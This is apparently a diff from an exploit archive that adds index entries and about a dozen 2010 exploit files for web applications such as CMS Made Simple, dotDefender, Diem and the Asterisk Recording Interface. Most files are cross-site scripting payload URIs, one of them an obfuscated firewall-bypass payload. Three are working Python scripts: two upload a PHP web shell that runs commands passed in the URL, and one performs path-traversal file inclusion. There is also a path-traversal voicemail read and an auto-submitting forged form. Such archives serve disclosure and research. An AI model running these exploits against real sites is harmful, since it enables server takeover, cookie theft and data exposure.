Updated 08_10_2014

files.csv

@@ -30880,3 +30880,16 @@ id,file,description,date,author,platform,type,port
 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0
 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0
 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0
+34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0
+34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0
+34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0
+34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 'clave' Parameter Cross Site Scripting Vulnerability",2010-07-12,"David K",java,webapps,0
+34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0
+34295,platforms/php/webapps/34295.txt,"RunCms 2.1 'magpie_debug.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 'css_optimiser.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass Vulnerability",2010-07-09,SH4V,multiple,remote,0
+34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 'default_cms_lang' Parameter Local File Include Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0
+34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0
+34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0

platforms/java/webapps/34290.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41529/info
+
+Mac's CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Mac's CMS 1.1.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php/footer/search?searchString='><script>alert('xss')</script> 

platforms/java/webapps/34293.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41541/info
+
+dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+dotDefender 4.02 is vulnerable; other versions may also be affected. 
+
+The following example URI is available:
+
+http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 

platforms/multiple/remote/34297.txt

@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/41560/info
+
+dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites.
+
+Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks. 
+
+<img src="WTF" onError="{var
+{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
+.source
+)" /> //POST
+
+<img src="WTF" onError="{var
+{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
+h%2Bn)(
+/0wn3d/.source)" /> //GET
+
+EXAMPLES:
+
+Blocked:
+http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E
+
+Unblocked:
+http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

platforms/multiple/remote/34301.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/41571/info
+
+The Asterisk Recording Interface is prone to the following issues:
+
+1. Multiple security bypass vulnerabilities.
+2. A cross-site request-forgery vulnerability.
+3. A cross-site scripting vulnerability.
+
+Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions. 
+
+The following example URIs are available:
+
+http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php
+
+http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt
+

platforms/php/webapps/34291.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41531/info
+
+Joomla! Rapid-Recipe component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+The following example input is available:
+
+">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> 

platforms/php/webapps/34292.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/41537/info
+
+eliteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+eliteCMS 1.01 is vulnerable; other versions may also be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/admin/edit_page.php?page=1[XSS]
+http://www.example.com/admin/edit_post.php?page=1[XSS]
+http://www.example.com/admin/add_post.php?page=1[XSS] 

platforms/php/webapps/34294.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41548/info
+
+FireStats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+FireStats 1.6.5 is vulnerable; other versions may be affected. 
+
+http://www.example.com/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
+http://www.example.com/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E
+http://www.example.com/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a=

platforms/php/webapps/34295.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41551/info
+
+RunCms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+RunCms 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E 

platforms/php/webapps/34296.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41552/info
+
+CSSTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. ImpressCMS versions that use the vulnerable application are also affected.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+CSSTidy 1.3 and ImpressCMS 1.2.1 are vulnerable; other versions may also be affected.
+
+http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 

platforms/php/webapps/34298.py

@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/41564/info
+
+The Download Manager module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Download Manager version 1.4.1 is vulnerable; other versions may also be affected. 
+
+import socket, re
+
+host = 'localhost'
+path = '/cmsms'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 189\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    http_ok = 'HTTP/1.1 200 OK'
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded'
+
+    shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
+        + re.search(u'shell_[^.]+\.php', resp).group(0)
+
+    s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
+           'Host: ' + host + '\r\n\r\n')
+
+    if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
+    else: print 'shell located at http://' + host + shell_path
+
+upload_shell()

platforms/php/webapps/34299.py

@@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/41565/info
+
+CMS Made Simple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+# ------------------------------------------------------------------------ 
+# Software................CMS Made Simple 1.8 
+# Vulnerability...........Local File Inclusion 
+# Download................http://www.cmsmadesimple.org/ 
+# Release Date............7/11/2010 
+# Tested On...............Windows Vista + XAMPP 
+# ------------------------------------------------------------------------ 
+# Author..................John Leitch 
+# Site....................http://cross-site-scripting.blogspot.com/ 
+# Email...................john.leitch5@gmail.com 
+# ------------------------------------------------------------------------ 
+#  
+# --Description--
+# 
+# A local file inclusion vulnerability in CMS Made Simple 1.8 can be
+# exploited to include arbitrary files.
+# 
+# 
+# --PoC--
+import httplib, urllib
+
+host = 'localhost'
+path = '/cmsms'
+
+lfi = '../' * 32 + 'windows/win.ini\x00'
+
+c = httplib.HTTPConnection(host)
+c.request('POST', path + '/admin/addbookmark.php',
+          urllib.urlencode({ 'default_cms_lang': lfi }),
+          { 'Content-type': 'application/x-www-form-urlencoded' })
+r = c.getresponse()
+
+print r.status, r.reason
+print r.read()

platforms/php/webapps/34300.py

@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/41569/info
+
+The Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Antz toolkit 1.02 is vulnerable; other versions may also be affected. 
+
+import socket
+
+host = 'localhost'
+path = '/cmsms'
+port = 80
+
+def upload_shell():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host, port))
+    s.settimeout(8)    
+
+    s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
+           'Host: localhost\r\n'
+           'Proxy-Connection: keep-alive\r\n'
+           'User-Agent: x\r\n'
+           'Content-Length: 257\r\n'
+           'Cache-Control: max-age=0\r\n'
+           'Origin: null\r\n'
+           'Content-Type: multipart/form-data; boundary=----x\r\n'
+           'Accept: text/html\r\n'
+           'Accept-Encoding: gzip,deflate,sdch\r\n'
+           'Accept-Language: en-US,en;q=0.8\r\n'
+           'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="antzSeed"\r\n'
+           '\r\n'
+           '\r\n'
+           '------x\r\n'
+           'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
+           'Content-Type: application/octet-stream\r\n'
+           '\r\n'
+           '<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
+           '------x--\r\n'
+           '\r\n')
+
+    resp = s.recv(8192)
+
+    s.close()
+
+    http_ok = 'HTTP/1.1 200 OK'
+    
+    if http_ok not in resp[:len(http_ok)]:
+        print 'error uploading shell'
+        return
+    else: print 'shell uploaded'
+
+    print 'searching for shell'
+
+    for i in range(0, 9999):
+
+        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'
+
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host, port))
+        s.settimeout(8)   
+    
+        s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
+               'Host: ' + host + '\r\n\r\n')
+
+        if http_ok in s.recv(8192)[:len(http_ok)]:
+            print '\r\nshell located at http://' + host + shell_path
+            break
+        else:
+            print '.',
+
+upload_shell()

platforms/php/webapps/34302.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/41587/info
+
+Diem is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Diem 5.1.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin.php/seo/pages/manage-pages/editField?dm_cpi=0&dm_xhr=1&value=title"><script>alert(document.cookie)<%2Fscript>&id=&page_id=1&field=title
+http://www.example.com/admin.php/+/dmCore/markdown?dm_cpi=0&dm_xhr=1&text=title"><script>alert(document.cookie)<%2Fscript>
+
+<form action="http://www.example.com/admin.php/content/blog/articles/filter" name="main" >
+<input type="hidden" name="article_form_filter[name][text]" value=&#039;1"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="article_form_filter[is_active]" value="" />
+<input type="hidden" name="article_form_filter[text][text]" value="" />
+<input type="hidden" name="article_form_filter[created_by]" value="" />
+<input type="hidden" name="article_form_filter[created_at]" value="" />
+<input type="hidden" name="article_form_filter[updated_at]" value="" />
+</form>
+<script>
+document.main.submit();
+</script>